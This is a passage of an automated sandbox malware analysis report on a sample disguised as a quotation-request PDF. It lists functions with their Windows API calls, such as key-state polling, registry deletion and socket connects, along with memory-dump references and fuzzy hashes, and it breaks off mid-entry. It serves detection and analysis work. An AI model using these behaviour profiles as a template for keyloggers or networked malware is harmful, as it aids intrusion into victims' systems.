                                                                    • Instruction Fuzzy Hash: 7D515F71208301ABD304EF65C885E5BB7A8FF88704F10892EB54597291D774E945CBA6
                                                                    Function 00464812 Relevance: 7.6, APIs: 5, Instructions: 145libraryloaderCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • LoadLibraryW.KERNEL32(00000000,?,?,?), ref: 0046485D
                                                                    • GetProcAddress.KERNEL32(?,?), ref: 004648F7
                                                                    • GetProcAddress.KERNEL32(?,00000000), ref: 00464916
                                                                    • GetProcAddress.KERNEL32(?,?), ref: 0046495A
                                                                    • FreeLibrary.KERNEL32(?,?,?,?), ref: 0046497C
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: AddressProc$Library$FreeLoad
                                                                    • String ID:
                                                                    • API String ID: 2449869053-0
                                                                    • Opcode ID: edca6472ef0d27ee7e2f9b628ab7156cf8e4f7811a7febfc4905c6c59bc609c9
                                                                    • Instruction ID: 8919579e2c9fc9b2d94c4928dd3202a5bdd7863bc063e44bf2a6fba2f1eed130
                                                                    • Opcode Fuzzy Hash: edca6472ef0d27ee7e2f9b628ab7156cf8e4f7811a7febfc4905c6c59bc609c9
                                                                    • Instruction Fuzzy Hash: 2351BF756002049FCB00EFA4C985A9EB7B4EF88304F14856EFD05AB392DB79ED45CB99
                                                                    Function 00456391 Relevance: 7.6, APIs: 5, Instructions: 130keyboardCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetCursorPos.USER32(?), ref: 004563A6
                                                                    • ScreenToClient.USER32(?,?), ref: 004563C3
                                                                    • GetAsyncKeyState.USER32(?), ref: 00456400
                                                                    • GetAsyncKeyState.USER32(?), ref: 00456410
                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00456466
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: AsyncState$ClientCursorLongScreenWindow
                                                                    • String ID:
                                                                    • API String ID: 3539004672-0
                                                                    • Opcode ID: 47775ca2c9d3ed855d965de7f9cc13cd0d0477b61ed95063c4b58fcc2d2fd159
                                                                    • Instruction ID: 60090bce41a6de58f2ab96a8453d1e3558661e38fd0c916b19f374a884add038
                                                                    • Opcode Fuzzy Hash: 47775ca2c9d3ed855d965de7f9cc13cd0d0477b61ed95063c4b58fcc2d2fd159
                                                                    • Instruction Fuzzy Hash: 49414C74504204BBDB24CF65C884EEFBBB8EB46326F60464EFC6593281CB34A944CB68
                                                                    Function 0047D40F Relevance: 7.6, APIs: 5, Instructions: 120sleepCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • InterlockedIncrement.KERNEL32(004A7F04), ref: 0047D438
                                                                    • InterlockedDecrement.KERNEL32(004A7F04), ref: 0047D44D
                                                                    • Sleep.KERNEL32(0000000A), ref: 0047D455
                                                                    • InterlockedIncrement.KERNEL32(004A7F04), ref: 0047D460
                                                                    • InterlockedDecrement.KERNEL32(004A7F04), ref: 0047D56A
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: Interlocked$DecrementIncrement$Sleep
                                                                    • String ID:
                                                                    • API String ID: 327565842-0
                                                                    • Opcode ID: a05157aca8d30d558f467c32ec822d8ac937f36e77973d55cccdaa836f381863
                                                                    • Instruction ID: e00c67d4cb89bf1d5311357fb713975cbca1e0cfcee7190b0451066ade77f289
                                                                    • Opcode Fuzzy Hash: a05157aca8d30d558f467c32ec822d8ac937f36e77973d55cccdaa836f381863
                                                                    • Instruction Fuzzy Hash: CC412571A002055FEB10DF65CD84AEE7774EF45304B10852EF609A7351E738EE46CB99
                                                                    Function 0045C3C1 Relevance: 7.6, APIs: 5, Instructions: 118COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetPrivateProfileSectionW.KERNEL32(00000000,?,?,00007FFF), ref: 0045C44F
                                                                    • GetPrivateProfileSectionW.KERNEL32(00000000,00000003,?,00000003), ref: 0045C477
                                                                    • WritePrivateProfileSectionW.KERNEL32(00000000,00000003,?), ref: 0045C4C3
                                                                    • WritePrivateProfileStringW.KERNEL32(00000000,?,00000000,00000000), ref: 0045C4E7
                                                                    • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 0045C4F6
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: PrivateProfile$SectionWrite$String
                                                                    • String ID:
                                                                    • API String ID: 2832842796-0
                                                                    • Opcode ID: 80413c63c247ca5a6c50c863bbc5616d4301eed01054a3e2b3b6367dcd347471
                                                                    • Instruction ID: 1eb5009190fa999c36a74edd43b7bd9b51adbc8f8691a9c3f5840d50e9073e8b
                                                                    • Opcode Fuzzy Hash: 80413c63c247ca5a6c50c863bbc5616d4301eed01054a3e2b3b6367dcd347471
                                                                    • Instruction Fuzzy Hash: D1413075A00209BFDB10EFA1DC85FAAB7A8BF44305F10855EF9049B292DA79EE44CB54
                                                                    Function 00441C7B Relevance: 7.6, APIs: 5, Instructions: 108registryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?), ref: 00441CA9
                                                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00441CDD
                                                                    • RegCloseKey.ADVAPI32(?), ref: 00441CFE
                                                                    • RegDeleteKeyW.ADVAPI32(?,?), ref: 00441D40
                                                                    • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00441D6E
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: Enum$CloseDeleteOpen
                                                                    • String ID:
                                                                    • API String ID: 2095303065-0
                                                                    • Opcode ID: d2ce045a3c5b7a9f88abc7d1956311aab30076c6419bcb4202e5cbde6d6cad15
                                                                    • Instruction ID: 7ca4c7ada97503ad9332fce322fe5d5fc03c2789ff93db080e75f28165cdf273
                                                                    • Opcode Fuzzy Hash: d2ce045a3c5b7a9f88abc7d1956311aab30076c6419bcb4202e5cbde6d6cad15
                                                                    • Instruction Fuzzy Hash: 69317CB2940108BAEB10DBD4DC85FFEB77CEB49304F04456EF605A7241D774AA858BA8
                                                                    Function 00436A0B Relevance: 7.6, APIs: 5, Instructions: 103COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetWindowRect.USER32(?,?), ref: 00436A24
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: RectWindow
                                                                    • String ID:
                                                                    • API String ID: 861336768-0
                                                                    • Opcode ID: d215e6d8dffd18d1ffc2da0b67cce38d66530bec6329dda4924901d83a0034d3
                                                                    • Instruction ID: 0a42da3bb0701689e96ef39581243ed39d97d4ba46bd7cd8c1f057aae640e0d3
                                                                    • Opcode Fuzzy Hash: d215e6d8dffd18d1ffc2da0b67cce38d66530bec6329dda4924901d83a0034d3
                                                                    • Instruction Fuzzy Hash: E531EA7160021EAFDB00DF68D988AAE77A5EB49324F11C62AFD24E7380D774EC11CB90
                                                                    Function 00449555 Relevance: 7.6, APIs: 5, Instructions: 96windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • SendMessageW.USER32 ref: 00449598
                                                                      • Part of subcall function 00430626: _wcspbrk.LIBCMT ref: 00430636
                                                                    • SendMessageW.USER32(?,00001074,?,?), ref: 004495F8
                                                                    • _wcslen.LIBCMT ref: 0044960D
                                                                    • _wcslen.LIBCMT ref: 0044961A
                                                                    • SendMessageW.USER32(?,00001074,?,?), ref: 0044964E
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$_wcslen$_wcspbrk
                                                                    • String ID:
                                                                    • API String ID: 1856069659-0
                                                                    • Opcode ID: eb2345d78995945919f1fca8909d98cd083db74a4e9b61e28a7ea2bcab757230
                                                                    • Instruction ID: 683be220b4a5e9d86ccbf412c3bd2f13dbb60120779f28b1c577ab6eeef24407
                                                                    • Opcode Fuzzy Hash: eb2345d78995945919f1fca8909d98cd083db74a4e9b61e28a7ea2bcab757230
                                                                    • Instruction Fuzzy Hash: 77318F71A00218ABEB20DF59DC80BDFB374FF94314F10466AFA0497280E7B59D958B94
                                                                    Function 004478AC Relevance: 7.6, APIs: 5, Instructions: 96windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetCursorPos.USER32(?), ref: 004478E2
                                                                    • TrackPopupMenuEx.USER32(00000000,00000000,?,?,?,00000000), ref: 004478FC
                                                                    • DefDlgProcW.USER32(?,0000007B,?,?), ref: 0044791D
                                                                    • GetCursorPos.USER32(00000000), ref: 0044796A
                                                                    • TrackPopupMenuEx.USER32(03396460,00000000,00000000,?,?,00000000), ref: 00447991
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: CursorMenuPopupTrack$Proc
                                                                    • String ID:
                                                                    • API String ID: 1300944170-0
                                                                    • Opcode ID: 3a0c1b1e924032964aae082f89503a6e76aba0c647238f1368234d9f75c94910
                                                                    • Instruction ID: 8079d3ea29232e2d8a780d7c6517a0c600664366e77620ab1eef72d1e193e80f
                                                                    • Opcode Fuzzy Hash: 3a0c1b1e924032964aae082f89503a6e76aba0c647238f1368234d9f75c94910
                                                                    • Instruction Fuzzy Hash: EF31CF75600108AFE724CF59DC88FABB768EB89310F20455AF94587391C775AC53CBA8
                                                                    Function 004479A0 Relevance: 7.6, APIs: 5, Instructions: 96COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetClientRect.USER32(?,?), ref: 004479CC
                                                                    • GetCursorPos.USER32(?), ref: 004479D7
                                                                    • ScreenToClient.USER32(?,?), ref: 004479F3
                                                                    • WindowFromPoint.USER32(?,?), ref: 00447A34
                                                                    • DefDlgProcW.USER32(?,00000020,?,?), ref: 00447AAD
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: Client$CursorFromPointProcRectScreenWindow
                                                                    • String ID:
                                                                    • API String ID: 1822080540-0
                                                                    • Opcode ID: 0f9a8e9b3e4e036e66763aee309a2391e7a5810cceb8633c4940fa55a949c157
                                                                    • Instruction ID: a7e7621e8492875af53c289f1ad187460d50aec5ad556b3834d9a5cb4abdf121
                                                                    • Opcode Fuzzy Hash: 0f9a8e9b3e4e036e66763aee309a2391e7a5810cceb8633c4940fa55a949c157
                                                                    • Instruction Fuzzy Hash: B831A2741082029FE710DF69D884D7FB7A4FB89314F144A1EF850D7291D774E946CBA6
                                                                    Function 00447BF1 Relevance: 7.6, APIs: 5, Instructions: 95COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetWindowRect.USER32(?,?), ref: 00447C5D
                                                                    • ScreenToClient.USER32(?,?), ref: 00447C7B
                                                                    • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00447C8E
                                                                    • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00447CD5
                                                                    • EndPaint.USER32(?,?), ref: 00447D13
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: ClientPaintRectRectangleScreenViewportWindow
                                                                    • String ID:
                                                                    • API String ID: 659298297-0
                                                                    • Opcode ID: 9df24dda7700d3462e91b7be9c0077b8f1985bebde9900174ed076ebcab1caeb
                                                                    • Instruction ID: 3c0582d8bc81ba5dadaaf244cb1f1d3939805113443e317e1f98b5bdeebaec33
                                                                    • Opcode Fuzzy Hash: 9df24dda7700d3462e91b7be9c0077b8f1985bebde9900174ed076ebcab1caeb
                                                                    • Instruction Fuzzy Hash: C33161706043019FE310CF25D8C8F7B7BE8EB86724F144A6EF9A5872A1C774A845DB69
                                                                    Function 004487EA Relevance: 7.6, APIs: 5, Instructions: 89COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • EnableWindow.USER32(?,00000000), ref: 00448B5C
                                                                    • EnableWindow.USER32(?,00000001), ref: 00448B72
                                                                    • ShowWindow.USER32(?,00000000), ref: 00448BE8
                                                                    • ShowWindow.USER32(?,00000004), ref: 00448BF4
                                                                    • EnableWindow.USER32(?,00000001), ref: 00448C09
                                                                      • Part of subcall function 00440D98: SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 00440DB8
                                                                      • Part of subcall function 00440D98: GetWindowLongW.USER32(?,000000F0), ref: 00440DFA
                                                                      • Part of subcall function 00440D98: GetWindowLongW.USER32(?,000000F0), ref: 00440E3A
                                                                      • Part of subcall function 00440D98: SendMessageW.USER32(03391B88,000000F1,00000000,00000000), ref: 00440E6E
                                                                      • Part of subcall function 00440D98: SendMessageW.USER32(03391B88,000000F1,00000001,00000000), ref: 00440E9A
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: Window$EnableMessageSend$LongShow
                                                                    • String ID:
                                                                    • API String ID: 142311417-0
                                                                    • Opcode ID: 426854c6b9cbeb660193a9c091743316caa306963ba13d8f93245475b3a006f2
                                                                    • Instruction ID: c941ec4e4e3d0536419715940b2668e48b64c275bb9f23e9dd6fd7b29375311a
                                                                    • Opcode Fuzzy Hash: 426854c6b9cbeb660193a9c091743316caa306963ba13d8f93245475b3a006f2
                                                                    • Instruction Fuzzy Hash: DE21F7B17443805BF7258E24CCC4BAFB7D0EF56345F08482EF98196391DBACA885C75A
                                                                    Function 004550FC Relevance: 7.6, APIs: 5, Instructions: 78COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: cfa96c7b92ceffa4878489be5d10f88277f639196488ca8149908940c9a32487
                                                                    • Instruction ID: af34b986bc09d21a6a739d25b45c5a22770885c200d938a8bd6fc5fff5094107
                                                                    • Opcode Fuzzy Hash: cfa96c7b92ceffa4878489be5d10f88277f639196488ca8149908940c9a32487
                                                                    • Instruction Fuzzy Hash: 5921AE75200600DBC710EF29E9D496B77B9EF49362B00466EFE5197392DB34EC09CB69
                                                                    Function 00445870 Relevance: 7.6, APIs: 5, Instructions: 78windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • IsWindowVisible.USER32(?), ref: 00445879
                                                                    • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00445893
                                                                    • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 004458CD
                                                                    • _wcslen.LIBCMT ref: 004458FB
                                                                    • CharUpperBuffW.USER32(00000000,00000000), ref: 00445905
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$BuffCharUpperVisibleWindow_wcslen
                                                                    • String ID:
                                                                    • API String ID: 3087257052-0
                                                                    • Opcode ID: 49a31b90cf943645e1d76703564da218b0e276787e595a84fd6716f5bb4df9c9
                                                                    • Instruction ID: ced771b0f23340e5f55e8fdbc4e1763ce6d97a07fd0b425722e47bce61cb145a
                                                                    • Opcode Fuzzy Hash: 49a31b90cf943645e1d76703564da218b0e276787e595a84fd6716f5bb4df9c9
                                                                    • Instruction Fuzzy Hash: F51136726009017BFB10AB25DC06F9FB78CAF65360F04403AF909D7241EB69ED5983A9
                                                                    Function 004653C8 Relevance: 7.6, APIs: 5, Instructions: 72networkCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 00465225: inet_addr.WSOCK32(?), ref: 00465249
                                                                    • socket.WSOCK32(00000002,00000001,00000006,00000000), ref: 004653FE
                                                                    • WSAGetLastError.WSOCK32(00000000), ref: 0046540D
                                                                    • connect.WSOCK32(00000000,?,00000010), ref: 00465446
                                                                    • WSAGetLastError.WSOCK32(00000000), ref: 0046546D
                                                                    • closesocket.WSOCK32(00000000,00000000), ref: 00465481
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
